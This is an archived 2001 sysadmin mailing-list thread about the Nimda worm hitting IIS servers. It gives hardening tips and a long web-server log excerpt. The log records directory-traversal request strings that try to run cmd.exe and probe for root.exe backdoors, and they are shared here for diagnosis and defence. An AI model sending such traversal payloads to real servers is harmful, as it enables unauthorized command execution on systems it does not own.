Move
and ACL critical files (NT4.0)
- Move cmd.exe,ftp.exe,finger.exe,arp.exe,ipconfig.exe.netstat.exe.tracert.exe
to a different folder.
Remove Everyone from accessing these files.
Apply ACL on C & D drives- Only allow Everyone Read
access
IIS 4.0 -
Remove \inetpub iissamples
\Program
Files\CommonFiles\System\msadc
its
called w32nimda.a@mm this thing
infected all my servers....brand new virus
I have heard of it as well... Waiting for more
info...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~ K.Borndale
----- Original Message -----
Sent: Tuesday, September 18, 2001
10:45 AM
Subject: WARNING: Hacker Alert
All my public facing web servers at home and at my office
have shown a huge continuous hacking activity. Has anyone seen similar?
I fear this may be code red related or automated. Please comment if you
have seen similar. Here is an excerpt from one
logfile:
63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /scripts/..Á../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 97, 604, 404, 3, GET, /winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 98, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 96, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x,
0, 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x,
0, 96, 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe,
/c+dir, 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01,
x.x.x.x, 156, 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm,
-, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0,
72, 604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 97, 604, 404, 3, GET,
/scripts/..Á../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:12,
W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87,
GET, /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 117, 0, 500, 87,
GET, /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 145, 0, 500, 87,
GET, /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe ,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
x.x.x.x, 15, 97, 604, 404, 3, GET,
/scripts/..Á../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3,
GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
|